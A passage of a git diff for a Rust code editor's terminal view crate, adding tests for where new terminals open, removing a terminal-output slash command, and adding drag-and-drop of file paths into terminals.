multi_workspace.workspace().update(cx, |workspace, cx| { + let panel = cx.new(|cx| TerminalPanel::new(workspace, window, cx)); + workspace.add_panel(panel.clone(), window, cx); + panel + }) + }) + .expect("Failed to initialize workspace with terminal panel"); + + (window_handle, terminal_panel) + } + + #[gpui::test] + async fn test_new_terminal_opens_in_panel_by_default(cx: &mut TestAppContext) { + cx.executor().allow_parking(); + init_test(cx); + + let (window_handle, terminal_panel) = init_workspace_with_panel(cx).await; + + let panel_items_before = + terminal_panel.read_with(cx, |panel, cx| panel.active_pane.read(cx).items_len()); + let center_items_before = window_handle + .read_with(cx, |multi_workspace, cx| { + multi_workspace + .workspace() + .read(cx) + .active_pane() + .read(cx) + .items_len() + }) + .expect("Failed to read center pane items"); + + window_handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + TerminalPanel::new_terminal( + workspace, + &workspace::NewTerminal::default(), + window, + cx, + ); + }) + }) + .expect("Failed to dispatch new_terminal"); + + cx.run_until_parked(); + + let panel_items_after = + terminal_panel.read_with(cx, |panel, cx| panel.active_pane.read(cx).items_len()); + let center_items_after = window_handle + .read_with(cx, |multi_workspace, cx| { + multi_workspace + .workspace() + .read(cx) + .active_pane() + .read(cx) + .items_len() + }) + .expect("Failed to read center pane items"); + + assert_eq!( + panel_items_after, + panel_items_before + 1, + "Terminal should be added to the panel when no center terminal is focused" + ); + assert_eq!( + center_items_after, center_items_before, + "Center pane should not gain a new terminal" + ); + } + + #[gpui::test] + async fn test_new_terminal_opens_in_center_when_center_terminal_focused( + cx: &mut TestAppContext, + ) { + cx.executor().allow_parking(); + init_test(cx); + + let (window_handle, terminal_panel) = init_workspace_with_panel(cx).await; + + window_handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + TerminalPanel::add_center_terminal(workspace, window, cx, |project, cx| { + project.create_terminal_shell(None, cx) + }) + }) + }) + .expect("Failed to update workspace") + .await + .expect("Failed to create center terminal"); + cx.run_until_parked(); + + let center_items_before = window_handle + .read_with(cx, |multi_workspace, cx| { + multi_workspace + .workspace() + .read(cx) + .active_pane() + .read(cx) + .items_len() + }) + .expect("Failed to read center pane items"); + assert_eq!(center_items_before, 1, "Center pane should have 1 terminal"); + + window_handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + let active_item = workspace + .active_pane() + .read(cx) + .active_item() + .expect("Center pane should have an active item"); + let terminal_view = active_item + .downcast::() + .expect("Active center item should be a TerminalView"); + window.focus(&terminal_view.focus_handle(cx), cx); + }) + }) + .expect("Failed to focus terminal view"); + cx.run_until_parked(); + + let panel_items_before = + terminal_panel.read_with(cx, |panel, cx| panel.active_pane.read(cx).items_len()); + + window_handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + TerminalPanel::new_terminal( + workspace, + &workspace::NewTerminal::default(), + window, + cx, + ); + }) + }) + .expect("Failed to dispatch new_terminal"); + cx.run_until_parked(); + + let center_items_after = window_handle + .read_with(cx, |multi_workspace, cx| { + multi_workspace + .workspace() + .read(cx) + .active_pane() + .read(cx) + .items_len() + }) + .expect("Failed to read center pane items"); + let panel_items_after = + terminal_panel.read_with(cx, |panel, cx| panel.active_pane.read(cx).items_len()); + + assert_eq!( + center_items_after, + center_items_before + 1, + "New terminal should be added to the center pane" + ); + assert_eq!( + panel_items_after, panel_items_before, + "Terminal panel should not gain a new terminal" + ); + } + + #[gpui::test] + async fn test_new_terminal_opens_in_panel_when_panel_focused(cx: &mut TestAppContext) { + cx.executor().allow_parking(); + init_test(cx); + + let (window_handle, terminal_panel) = init_workspace_with_panel(cx).await; + + window_handle + .update(cx, |_, window, cx| { + terminal_panel.update(cx, |panel, cx| { + panel.add_terminal_shell(None, RevealStrategy::Always, window, cx) + }) + }) + .expect("Failed to update workspace") + .await + .expect("Failed to create panel terminal"); + cx.run_until_parked(); + + window_handle + .update(cx, |_, window, cx| { + window.focus(&terminal_panel.read(cx).focus_handle(cx), cx); + }) + .expect("Failed to focus terminal panel"); + cx.run_until_parked(); + + let panel_items_before = + terminal_panel.read_with(cx, |panel, cx| panel.active_pane.read(cx).items_len()); + + let center_items_before = window_handle + .read_with(cx, |multi_workspace, cx| { + multi_workspace + .workspace() + .read(cx) + .active_pane() + .read(cx) + .items_len() + }) + .expect("Failed to read center pane items"); + + window_handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + TerminalPanel::new_terminal( + workspace, + &workspace::NewTerminal::default(), + window, + cx, + ); + }) + }) + .expect("Failed to dispatch new_terminal"); + cx.run_until_parked(); + + let panel_items_after = + terminal_panel.read_with(cx, |panel, cx| panel.active_pane.read(cx).items_len()); + let center_items_after = window_handle + .read_with(cx, |multi_workspace, cx| { + multi_workspace + .workspace() + .read(cx) + .active_pane() + .read(cx) + .items_len() + }) + .expect("Failed to read center pane items"); + + assert_eq!( + panel_items_after, + panel_items_before + 1, + "New terminal should be added to the panel when panel is focused" + ); + assert_eq!( + center_items_after, center_items_before, + "Center pane should not gain a new terminal" + ); + } + + #[gpui::test] + async fn test_new_local_terminal_opens_in_center_when_center_terminal_focused( + cx: &mut TestAppContext, + ) { + cx.executor().allow_parking(); + init_test(cx); + + let (window_handle, terminal_panel) = init_workspace_with_panel(cx).await; + + window_handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + TerminalPanel::add_center_terminal(workspace, window, cx, |project, cx| { + project.create_terminal_shell(None, cx) + }) + }) + }) + .expect("Failed to update workspace") + .await + .expect("Failed to create center terminal"); + cx.run_until_parked(); + + window_handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + let active_item = workspace + .active_pane() + .read(cx) + .active_item() + .expect("Center pane should have an active item"); + let terminal_view = active_item + .downcast::() + .expect("Active center item should be a TerminalView"); + window.focus(&terminal_view.focus_handle(cx), cx); + }) + }) + .expect("Failed to focus terminal view"); + cx.run_until_parked(); + + let center_items_before = window_handle + .read_with(cx, |multi_workspace, cx| { + multi_workspace + .workspace() + .read(cx) + .active_pane() + .read(cx) + .items_len() + }) + .expect("Failed to read center pane items"); + let panel_items_before = + terminal_panel.read_with(cx, |panel, cx| panel.active_pane.read(cx).items_len()); + + window_handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + TerminalPanel::new_terminal( + workspace, + &workspace::NewTerminal { local: true }, + window, + cx, + ); + }) + }) + .expect("Failed to dispatch new_terminal with local=true"); + cx.run_until_parked(); + + let center_items_after = window_handle + .read_with(cx, |multi_workspace, cx| { + multi_workspace + .workspace() + .read(cx) + .active_pane() + .read(cx) + .items_len() + }) + .expect("Failed to read center pane items"); + let panel_items_after = + terminal_panel.read_with(cx, |panel, cx| panel.active_pane.read(cx).items_len()); + + assert_eq!( + center_items_after, + center_items_before + 1, + "New local terminal should be added to the center pane" + ); + assert_eq!( + panel_items_after, panel_items_before, + "Terminal panel should not gain a new terminal" + ); + } + + #[gpui::test] + async fn test_new_terminal_opens_in_panel_when_panel_focused_and_center_has_terminal( + cx: &mut TestAppContext, + ) { + cx.executor().allow_parking(); + init_test(cx); + + let (window_handle, terminal_panel) = init_workspace_with_panel(cx).await; + + window_handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + TerminalPanel::add_center_terminal(workspace, window, cx, |project, cx| { + project.create_terminal_shell(None, cx) + }) + }) + }) + .expect("Failed to update workspace") + .await + .expect("Failed to create center terminal"); + cx.run_until_parked(); + + window_handle + .update(cx, |_, window, cx| { + terminal_panel.update(cx, |panel, cx| { + panel.add_terminal_shell(None, RevealStrategy::Always, window, cx) + }) + }) + .expect("Failed to update workspace") + .await + .expect("Failed to create panel terminal"); + cx.run_until_parked(); + + window_handle + .update(cx, |_, window, cx| { + window.focus(&terminal_panel.read(cx).focus_handle(cx), cx); + }) + .expect("Failed to focus terminal panel"); + cx.run_until_parked(); + + let panel_items_before = + terminal_panel.read_with(cx, |panel, cx| panel.active_pane.read(cx).items_len()); + let center_items_before = window_handle + .read_with(cx, |multi_workspace, cx| { + multi_workspace + .workspace() + .read(cx) + .active_pane() + .read(cx) + .items_len() + }) + .expect("Failed to read center pane items"); + + window_handle + .update(cx, |multi_workspace, window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + TerminalPanel::new_terminal( + workspace, + &workspace::NewTerminal::default(), + window, + cx, + ); + }) + }) + .expect("Failed to dispatch new_terminal"); + cx.run_until_parked(); + + let panel_items_after = + terminal_panel.read_with(cx, |panel, cx| panel.active_pane.read(cx).items_len()); + let center_items_after = window_handle + .read_with(cx, |multi_workspace, cx| { + multi_workspace + .workspace() + .read(cx) + .active_pane() + .read(cx) + .items_len() + }) + .expect("Failed to read center pane items"); + + assert_eq!( + panel_items_after, + panel_items_before + 1, + "New terminal should go to panel when panel is focused, even if center has a terminal" + ); + assert_eq!( + center_items_after, center_items_before, + "Center pane should not gain a new terminal when panel is focused" + ); + } + fn set_max_tabs(cx: &mut TestAppContext, value: Option) { cx.update_global(|store: &mut SettingsStore, cx| { store.update_user_settings(cx, |settings| { @@ -2037,7 +2360,7 @@ mod tests { cx.update(|cx| { let store = SettingsStore::test(cx); cx.set_global(store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); editor::init(cx); crate::init(cx); }); diff --git a/crates/terminal_view/src/terminal_path_like_target.rs b/crates/terminal_view/src/terminal_path_like_target.rs index 18eab6fc5b4ccca1bcc6db33a35dc490582037ac..f0f13d8fc2cd737722f30d7e56248e4284ed4495 100644 --- a/crates/terminal_view/src/terminal_path_like_target.rs +++ b/crates/terminal_view/src/terminal_path_like_target.rs @@ -554,7 +554,7 @@ mod tests { let fs = app_cx.update(AppState::test).fs.as_fake().clone(); app_cx.update(|cx| { - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); editor::init(cx); }); diff --git a/crates/terminal_view/src/terminal_scrollbar.rs b/crates/terminal_view/src/terminal_scrollbar.rs index 82ca0b4097dad1be899879b0241aed50d8e60bfa..16dc580e877310b79501ca469b0351935dbb46f7 100644 --- a/crates/terminal_view/src/terminal_scrollbar.rs +++ b/crates/terminal_view/src/terminal_scrollbar.rs @@ -3,7 +3,7 @@ use std::{ rc::Rc, }; -use gpui::{Bounds, Point, Size, size}; +use gpui::{Bounds, Point, point, size}; use terminal::Terminal; use ui::{Pixels, ScrollableHandle, px}; @@ -46,9 +46,9 @@ impl TerminalScrollHandle { } impl ScrollableHandle for TerminalScrollHandle { - fn max_offset(&self) -> Size { + fn max_offset(&self) -> Point { let state = self.state.borrow(); - size( + point( Pixels::ZERO, state.total_lines.saturating_sub(state.viewport_lines) as f32 * state.line_height, ) diff --git a/crates/terminal_view/src/terminal_slash_command.rs b/crates/terminal_view/src/terminal_slash_command.rs deleted file mode 100644 index 13c2cef48c3596d77c1bc7f00587f17dfc1c75e5..0000000000000000000000000000000000000000 --- a/crates/terminal_view/src/terminal_slash_command.rs +++ /dev/null @@ -1,129 +0,0 @@ -use std::sync::Arc; -use std::sync::atomic::AtomicBool; - -use crate::{TerminalView, terminal_panel::TerminalPanel}; -use anyhow::Result; -use assistant_slash_command::{ - ArgumentCompletion, SlashCommand, SlashCommandOutput, SlashCommandOutputSection, - SlashCommandResult, -}; -use gpui::{App, Entity, Task, WeakEntity}; -use language::{BufferSnapshot, CodeLabel, LspAdapterDelegate}; -use ui::prelude::*; -use workspace::{Workspace, dock::Panel}; - -use assistant_slash_command::create_label_for_command; - -pub struct TerminalSlashCommand; - -const LINE_COUNT_ARG: &str = "--line-count"; - -const DEFAULT_CONTEXT_LINES: usize = 50; - -impl SlashCommand for TerminalSlashCommand { - fn name(&self) -> String { - "terminal".into() - } - - fn label(&self, cx: &App) -> CodeLabel { - create_label_for_command("terminal", &[LINE_COUNT_ARG], cx) - } - - fn description(&self) -> String { - "Insert terminal output".into() - } - - fn icon(&self) -> IconName { - IconName::Terminal - } - - fn menu_text(&self) -> String { - self.description() - } - - fn requires_argument(&self) -> bool { - false - } - - fn accepts_arguments(&self) -> bool { - true - } - - fn complete_argument( - self: Arc, - _arguments: &[String], - _cancel: Arc, - _workspace: Option>, - _window: &mut Window, - _cx: &mut App, - ) -> Task>> { - Task::ready(Ok(Vec::new())) - } - - fn run( - self: Arc, - arguments: &[String], - _context_slash_command_output_sections: &[SlashCommandOutputSection], - _context_buffer: BufferSnapshot, - workspace: WeakEntity, - _delegate: Option>, - _: &mut Window, - cx: &mut App, - ) -> Task { - let Some(workspace) = workspace.upgrade() else { - return Task::ready(Err(anyhow::anyhow!("workspace was dropped"))); - }; - - let Some(active_terminal) = resolve_active_terminal(&workspace, cx) else { - return Task::ready(Err(anyhow::anyhow!("no active terminal"))); - }; - - let line_count = arguments - .get(0) - .and_then(|s| s.parse::().ok()) - .unwrap_or(DEFAULT_CONTEXT_LINES); - - let lines = active_terminal - .read(cx) - .entity() - .read(cx) - .last_n_non_empty_lines(line_count); - - let mut text = String::new(); - text.push_str("Terminal output:\n"); - text.push_str(&lines.join("\n")); - let range = 0..text.len(); - - Task::ready(Ok(SlashCommandOutput { - text, - sections: vec![SlashCommandOutputSection { - range, - icon: IconName::Terminal, - label: "Terminal".into(), - metadata: None, - }], - run_commands_in_text: false, - } - .into_event_stream())) - } -} - -fn resolve_active_terminal( - workspace: &Entity, - cx: &mut App, -) -> Option> { - if let Some(terminal_view) = workspace - .read(cx) - .active_item(cx) - .and_then(|item| item.act_as::(cx)) - { - return Some(terminal_view); - } - - let terminal_panel = workspace.read(cx).panel::(cx)?; - terminal_panel.read(cx).pane().and_then(|pane| { - pane.read(cx) - .active_item() - .and_then(|t| t.downcast::()) - }) -} diff --git a/crates/terminal_view/src/terminal_view.rs b/crates/terminal_view/src/terminal_view.rs index eaba1f22682a759d8cfce42e555ca692cee9ada6..acccd6129f75ee2f5213fa359203220a7fee08c0 100644 --- a/crates/terminal_view/src/terminal_view.rs +++ b/crates/terminal_view/src/terminal_view.rs @@ -3,23 +3,26 @@ pub mod terminal_element; pub mod terminal_panel; mod terminal_path_like_target; pub mod terminal_scrollbar; -mod terminal_slash_command; -use assistant_slash_command::SlashCommandRegistry; -use editor::{Editor, EditorSettings, actions::SelectAll, blink_manager::BlinkManager}; +use editor::{ + Editor, EditorSettings, actions::SelectAll, blink_manager::BlinkManager, + ui_scrollbar_settings_from_raw, +}; use gpui::{ - Action, AnyElement, App, ClipboardEntry, DismissEvent, Entity, EventEmitter, FocusHandle, - Focusable, KeyContext, KeyDownEvent, Keystroke, MouseButton, MouseDownEvent, Pixels, Point, - Render, ScrollWheelEvent, Styled, Subscription, Task, WeakEntity, actions, anchored, deferred, - div, + Action, AnyElement, App, ClipboardEntry, DismissEvent, Entity, EventEmitter, ExternalPaths, + FocusHandle, Focusable, Font, KeyContext, KeyDownEvent, Keystroke, MouseButton, MouseDownEvent, + Pixels, Point, Render, ScrollWheelEvent, Styled, Subscription, Task, WeakEntity, actions, + anchored, deferred, div, }; +use itertools::Itertools; use menu; -use persistence::TERMINAL_DB; -use project::{Project, search::SearchQuery}; +use persistence::TerminalDb; +use project::{Project, ProjectEntryId, search::SearchQuery}; use schemars::JsonSchema; use serde::Deserialize; use settings::{Settings, SettingsStore, TerminalBlink, WorkingDirectory}; use std::{ + any::Any, cmp, ops::{Range, RangeInclusive}, path::{Path, PathBuf}, @@ -42,18 +45,17 @@ use terminal_element::TerminalElement; use terminal_panel::TerminalPanel; use terminal_path_like_target::{hover_path_like_target, open_path_like_target}; use terminal_scrollbar::TerminalScrollHandle; -use terminal_slash_command::TerminalSlashCommand; use ui::{ ContextMenu, Divider, ScrollAxes, Scrollbars, Tooltip, WithScrollbar, prelude::*, - scrollbars::{self, GlobalSetting, ScrollbarVisibility}, + scrollbars::{self, ScrollbarVisibility}, }; use util::ResultExt; use workspace::{ - CloseActiveItem, NewCenterTerminal, NewTerminal, ToolbarItemLocation, Workspace, WorkspaceId, - delete_unloaded_items, + CloseActiveItem, DraggedSelection, DraggedTab, NewCenterTerminal, NewTerminal, Pane, + ToolbarItemLocation, Workspace, WorkspaceId, delete_unloaded_items, item::{ - BreadcrumbText, Item, ItemEvent, SerializableItem, TabContentParams, TabTooltipContent, + HighlightedText, Item, ItemEvent, SerializableItem, TabContentParams, TabTooltipContent, }, register_serializable_item, searchable::{ @@ -96,7 +98,6 @@ actions!( pub struct RenameTerminal; pub fn init(cx: &mut App) { - assistant_slash_command::init(cx); terminal_panel::init(cx); register_serializable_item::(cx); @@ -105,7 +106,6 @@ pub fn init(cx: &mut App) { workspace.register_action(TerminalView::deploy); }) .detach(); - SlashCommandRegistry::global(cx).register_command(TerminalSlashCommand, true); } pub struct BlockProperties { @@ -752,7 +752,14 @@ impl TerminalView { } pub fn should_show_cursor(&self, focused: bool, cx: &mut Context) -> bool { - // Always show cursor when not focused or in special modes + // Hide cursor when in embedded mode and not focused (read-only output like Agent panel) + if let TerminalMode::Embedded { .. } = &self.mode { + if !focused { + return false; + } + } + + // For Standalone mode: always show cursor when not focused or in special modes if !focused || self .terminal @@ -811,17 +818,16 @@ impl TerminalView { return; }; - if clipboard.entries().iter().any(|entry| match entry { - ClipboardEntry::Image(image) => !image.bytes.is_empty(), - _ => false, - }) { - self.forward_ctrl_v(cx); - return; - } - - if let Some(text) = clipboard.text() { - self.terminal - .update(cx, |terminal, _cx| terminal.paste(&text)); + match clipboard.entries().first() { + Some(ClipboardEntry::Image(image)) if !image.bytes.is_empty() => { + self.forward_ctrl_v(cx); + } + _ => { + if let Some(text) = clipboard.text() { + self.terminal + .update(cx, |terminal, _cx| terminal.paste(&text)); + } + } } } @@ -833,8 +839,18 @@ impl TerminalView { }); } + fn add_paths_to_terminal(&self, paths: &[PathBuf], window: &mut Window, cx: &mut App) { + let mut text = paths.iter().map(|path| format!(" {path:?}")).join(""); + text.push(' '); + window.focus(&self.focus_handle(cx), cx); + self.terminal.update(cx, |terminal, _| { + terminal.paste(&text); + }); + } + fn send_text(&mut self, text: &SendText, _: &mut Window, cx: &mut Context) { self.clear_bell(cx); + self.blink_manager.update(cx, BlinkManager::pause_blinking); self.terminal.update(cx, |term, _| { term.input(text.0.to_string().into_bytes()); }); @@ -843,6 +859,7 @@ impl TerminalView { fn send_keystroke(&mut self, text: &SendKeystroke, _: &mut Window, cx: &mut Context) { if let Some(keystroke) = Keystroke::parse(&text.0).log_err() { self.clear_bell(cx); + self.blink_manager.update(cx, BlinkManager::pause_blinking); self.process_keystroke(&keystroke, cx); } } @@ -1104,20 +1121,15 @@ fn regex_search_for_query(query: &SearchQuery) -> Option { } } +#[derive(Default)] struct TerminalScrollbarSettingsWrapper; -impl GlobalSetting for TerminalScrollbarSettingsWrapper { - fn get_value(_cx: &App) -> &Self { - &Self - } -} - impl ScrollbarVisibility for TerminalScrollbarSettingsWrapper { fn visibility(&self, cx: &App) -> scrollbars::ShowScrollbar { TerminalSettings::get_global(cx) .scrollbar .show - .map(Into::into) + .map(ui_scrollbar_settings_from_raw) .unwrap_or_else(|| EditorSettings::get_global(cx).scrollbar.show) } } @@ -1340,9 +1352,16 @@ impl Item for TerminalView { None => (IconName::Terminal, Color::Muted, None), }; + let self_handle = self.self_handle.clone(); h_flex() .gap_1() .group("term-tab-icon") + .track_focus(&self.focus_handle) + .on_action(move |action: &RenameTerminal, window, cx| { + self_handle + .update(cx, |this, cx| this.rename_terminal(action, window, cx)) + .ok(); + }) .child( h_flex() .group("term-tab-icon") @@ -1412,6 +1431,154 @@ impl Item for TerminalView { None } + fn handle_drop( + &self, + active_pane: &Pane, + dropped: &dyn Any, + window: &mut Window, + cx: &mut App, + ) -> bool { + let Some(project) = self.project.upgrade() else { + return false; + }; + + if let Some(paths) = dropped.downcast_ref::() { + let is_local = project.read(cx).is_local(); + if is_local { + self.add_paths_to_terminal(paths.paths(), window, cx); + return true; + } + + return false; + } else if let Some(tab) = dropped.downcast_ref::() { + let Some(self_handle) = self.self_handle.upgrade() else { + return false; + }; + + let Some(workspace) = self.workspace.upgrade() else { + return false; + }; + + let Some(this_pane) = workspace.read(cx).pane_for(&self_handle) else { + return false; + }; + + let item = if tab.pane == this_pane { + active_pane.item_for_index(tab.ix) + } else { + tab.pane.read(cx).item_for_index(tab.ix) + }; + + let Some(item) = item else { + return false; + }; + + if item.downcast::().is_some() { + let Some(split_direction) = active_pane.drag_split_direction() else { + return false; + }; + + let Some(terminal_panel) = workspace.read(cx).panel::(cx) else { + return false; + }; + + if !terminal_panel.read(cx).center.panes().contains(&&this_pane) { + return false; + } + + let source = tab.pane.clone(); + let item_id_to_move = item.item_id(); + let is_zoomed = { + let terminal_panel = terminal_panel.read(cx); + if terminal_panel.active_pane == this_pane { + active_pane.is_zoomed() + } else { + terminal_panel.active_pane.read(cx).is_zoomed() + } + }; + + let workspace = workspace.downgrade(); + let terminal_panel = terminal_panel.downgrade(); + // Defer the split operation to avoid re-entrancy panic. + // The pane may be the one currently being updated, so we cannot + // call mark_positions (via split) synchronously. + window + .spawn(cx, async move |cx| { + cx.update(|window, cx| { + let Ok(new_pane) = terminal_panel.update(cx, |terminal_panel, cx| { + let new_pane = terminal_panel::new_terminal_pane( + workspace, project, is_zoomed, window, cx, + ); + terminal_panel.apply_tab_bar_buttons(&new_pane, cx); + terminal_panel.center.split( + &this_pane, + &new_pane, + split_direction, + cx, + ); + anyhow::Ok(new_pane) + }) else { + return; + }; + + let Some(new_pane) = new_pane.log_err() else { + return; + }; + + workspace::move_item( + &source, + &new_pane, + item_id_to_move, + new_pane.read(cx).active_item_index(), + true, + window, + cx, + ); + }) + .ok(); + }) + .detach(); + + return true; + } else { + if let Some(project_path) = item.project_path(cx) + && let Some(path) = project.read(cx).absolute_path(&project_path, cx) + { + self.add_paths_to_terminal(&[path], window, cx); + return true; + } + } + + return false; + } else if let Some(selection) = dropped.downcast_ref::() { + let project = project.read(cx); + let paths = selection + .items() + .map(|selected_entry| selected_entry.entry_id) + .filter_map(|entry_id| project.path_for_entry(entry_id, cx)) + .filter_map(|project_path| project.absolute_path(&project_path, cx)) + .collect::>(); + + if !paths.is_empty() { + self.add_paths_to_terminal(&paths, window, cx); + } + + return true; + } else if let Some(&entry_id) = dropped.downcast_ref::() { + let project = project.read(cx); + if let Some(path) = project + .path_for_entry(entry_id, cx) + .and_then(|project_path| project.absolute_path(&project_path, cx)) + { + self.add_paths_to_terminal(&[path], window, cx); + } + + return true; + } + + false + } + fn tab_extra_context_menu_actions( &self, _window: &mut Window, @@ -1496,12 +1663,14 @@ impl Item for TerminalView { } } - fn breadcrumbs(&self, cx: &App) -> Option> { - Some(vec![BreadcrumbText { - text: self.terminal().read(cx).breadcrumb_text.clone(), - highlights: None, - font: None, - }]) + fn breadcrumbs(&self, cx: &App) -> Option<(Vec, Option)> { + Some(( + vec![HighlightedText { + text: self.terminal().read(cx).breadcrumb_text.clone().into(), + highlights: vec![], + }], + None, + )) } fn added_to_workspace( @@ -1515,11 +1684,11 @@ impl Item for TerminalView { log::debug!( "Updating workspace id for the terminal, old: {old_id:?}, new: {new_id:?}", ); - cx.background_spawn(TERMINAL_DB.update_workspace_id( - new_id, - old_id, - cx.entity_id().as_u64(), - )) + let db = TerminalDb::global(cx); + let entity_id = cx.entity_id().as_u64(); + cx.background_spawn(async move { + db.update_workspace_id(new_id, old_id, entity_id).await + }) .detach(); } self.workspace_id = workspace.database_id(); @@ -1542,7 +1711,8 @@ impl SerializableItem for TerminalView { _window: &mut Window, cx: &mut App, ) -> Task> { - delete_unloaded_items(alive_items, workspace_id, "terminals", &TERMINAL_DB, cx) + let db = TerminalDb::global(cx); + delete_unloaded_items(alive_items, workspace_id, "terminals", &db, cx) } fn serialize( @@ -1567,14 +1737,13 @@ impl SerializableItem for TerminalView { let custom_title = self.custom_title.clone(); self.needs_serialize = false; + let db = TerminalDb::global(cx); Some(cx.background_spawn(async move { if let Some(cwd) = cwd { - TERMINAL_DB - .save_working_directory(item_id, workspace_id, cwd) + db.save_working_directory(item_id, workspace_id, cwd) .await?; } - TERMINAL_DB - .save_custom_title(item_id, workspace_id, custom_title) + db.save_custom_title(item_id, workspace_id, custom_title) .await?; Ok(()) })) @@ -1595,7 +1764,8 @@ impl SerializableItem for TerminalView { window.spawn(cx, async move |cx| { let (cwd, custom_title) = cx .update(|_window, cx| { - let from_db = TERMINAL_DB + let db = TerminalDb::global(cx); + let from_db = db .get_working_directory(item_id, workspace_id) .log_err() .flatten(); @@ -1609,7 +1779,7 @@ impl SerializableItem for TerminalView { .upgrade() .and_then(|workspace| default_working_directory(workspace.read(cx), cx)) }; - let custom_title = TERMINAL_DB + let custom_title = db .get_custom_title(item_id, workspace_id) .log_err() .flatten() @@ -1652,6 +1822,7 @@ impl SearchableItem for TerminalView { regex: true, replacement: false, selection: false, + select_all: false, find_in_results: false, } } @@ -1840,10 +2011,46 @@ mod tests { use super::*; use gpui::TestAppContext; use project::{Entry, Project, ProjectPath, Worktree}; - use std::path::Path; + use std::path::{Path, PathBuf}; use util::paths::PathStyle; use util::rel_path::RelPath; - use workspace::{AppState, MultiWorkspace}; + use workspace::item::test::{TestItem, TestProjectItem}; + use workspace::{AppState, MultiWorkspace, SelectedEntry}; + + fn expected_drop_text(paths: &[PathBuf]) -> String { + let mut text = String::new(); + for path in paths { + text.push(' '); + text.push_str(&format!("{path:?}")); + } + text.push(' '); + text + } + + fn assert_drop_writes_to_terminal( + pane: &Entity, + terminal_view_index: usize, + terminal: &Entity, + dropped: &dyn Any, + expected_text: &str, + window: &mut Window, + cx: &mut Context, + ) { + let _ = terminal.update(cx, |terminal, _| terminal.take_input_log()); + + let handled = pane.update(cx, |pane, cx| { + pane.item_for_index(terminal_view_index) + .unwrap() + .handle_drop(pane, dropped, window, cx) + }); + assert!(handled, "handle_drop should return true for {:?}", dropped); + + let mut input_log = terminal.update(cx, |terminal, _| terminal.take_input_log()); + assert_eq!(input_log.len(), 1, "expected exactly one write to terminal"); + let written = + String::from_utf8(input_log.remove(0)).expect("terminal write should be valid UTF-8"); + assert_eq!(written, expected_text); + } // Working directory calculation tests @@ -1972,24 +2179,7 @@ mod tests { let (project, _workspace) = init_test(cx).await; let (wt, _entry) = create_folder_wt(project.clone(), "/root/", cx).await; - let entry = cx - .update(|cx| { - wt.update(cx, |wt, cx| { - wt.create_entry( - RelPath::new(Path::new("src/main.rs"), PathStyle::local()) - .unwrap() - .as_ref() - .into(), - false, - None, - cx, - ) - }) - }) - .await - .unwrap() - .into_included() - .unwrap(); + let entry = create_file_in_worktree(wt.clone(), "src/main.rs", cx).await; insert_active_entry_for(wt, entry, project.clone(), cx); cx.update(|cx| { @@ -2014,9 +2204,21 @@ mod tests { /// Creates a worktree with 1 file: /root.txt pub async fn init_test(cx: &mut TestAppContext) -> (Entity, Entity) { + let (project, workspace, _) = init_test_with_window(cx).await; + (project, workspace) + } + + /// Creates a worktree with 1 file /root.txt and returns the project, workspace, and window handle. + async fn init_test_with_window( + cx: &mut TestAppContext, + ) -> ( + Entity, + Entity, + gpui::WindowHandle, + ) { let params = cx.update(AppState::test); cx.update(|cx| { - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); }); let project = Project::test(params.fs.clone(), [], cx).await; @@ -2026,7 +2228,32 @@ mod tests { .read_with(cx, |mw, _| mw.workspace().clone()) .unwrap(); - (project, workspace) + (project, workspace, window_handle) + } + + /// Creates a file in the given worktree and returns its entry. + async fn create_file_in_worktree( + worktree: Entity, + relative_path: impl AsRef, + cx: &mut TestAppContext, + ) -> Entry { + cx.update(|cx| { + worktree.update(cx, |worktree, cx| { + worktree.create_entry( + RelPath::new(relative_path.as_ref(), PathStyle::local()) + .unwrap() + .as_ref() + .into(), + false, + None, + cx, + ) + }) + }) + .await + .unwrap() + .into_included() + .unwrap() } /// Creates a worktree with 1 folder: /root{suffix}/ @@ -2089,6 +2316,183 @@ mod tests { }); } + // Terminal drag/drop test + + #[gpui::test] + async fn test_handle_drop_writes_paths_for_all_drop_types(cx: &mut TestAppContext) { + let (project, _workspace, window_handle) = init_test_with_window(cx).await; + + let (worktree, _) = create_folder_wt(project.clone(), "/root/", cx).await; + let first_entry = create_file_in_worktree(worktree.clone(), "first.txt", cx).await; + let second_entry = create_file_in_worktree(worktree.clone(), "second.txt", cx).await; + + let worktree_id = worktree.read_with(cx, |worktree, _| worktree.id()); + let first_path = project + .read_with(cx, |project, cx| { + project.absolute_path( + &ProjectPath { + worktree_id, + path: first_entry.path.clone(), + }, + cx, + ) + }) + .unwrap(); + let second_path = project + .read_with(cx, |project, cx| { + project.absolute_path( + &ProjectPath { + worktree_id, + path: second_entry.path.clone(), + }, + cx, + ) + }) + .unwrap(); + + let (active_pane, terminal, terminal_view, tab_item) = window_handle + .update(cx, |multi_workspace, window, cx| { + let workspace = multi_workspace.workspace().clone(); + let active_pane = workspace.read(cx).active_pane().clone(); + + let terminal = cx.new(|cx| { + terminal::TerminalBuilder::new_display_only( + CursorShape::default(), + terminal::terminal_settings::AlternateScroll::On, + None, + 0, + cx.background_executor(), + PathStyle::local(), + ) + .unwrap() + .subscribe(cx) + }); + let terminal_view = cx.new(|cx| { + TerminalView::new( + terminal.clone(), + workspace.downgrade(), + None, + project.downgrade(), + window, + cx, + ) + }); + + active_pane.update(cx, |pane, cx| { + pane.add_item( + Box::new(terminal_view.clone()), + true, + false, + None, + window, + cx, + ); + }); + + let tab_project_item = cx.new(|_| TestProjectItem { + entry_id: Some(second_entry.id), + project_path: Some(ProjectPath { + 